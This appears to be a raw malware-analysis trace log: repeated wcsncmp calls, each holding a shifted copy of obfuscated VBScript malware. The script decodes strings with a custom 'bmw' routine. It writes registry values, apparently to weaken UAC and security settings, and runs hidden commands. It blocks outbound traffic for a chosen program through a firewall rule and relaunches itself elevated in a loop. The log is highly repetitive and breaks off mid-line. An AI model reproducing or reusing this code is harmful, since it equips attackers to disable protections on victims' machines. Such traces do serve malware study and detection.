1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0223.011] wcsncmp (_String1="m newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0223.011] wcsncmp (_String1=" newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.012] wcsncmp (_String1="newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.012] wcsncmp (_String1="ewRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.012] wcsncmp (_String1="wRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 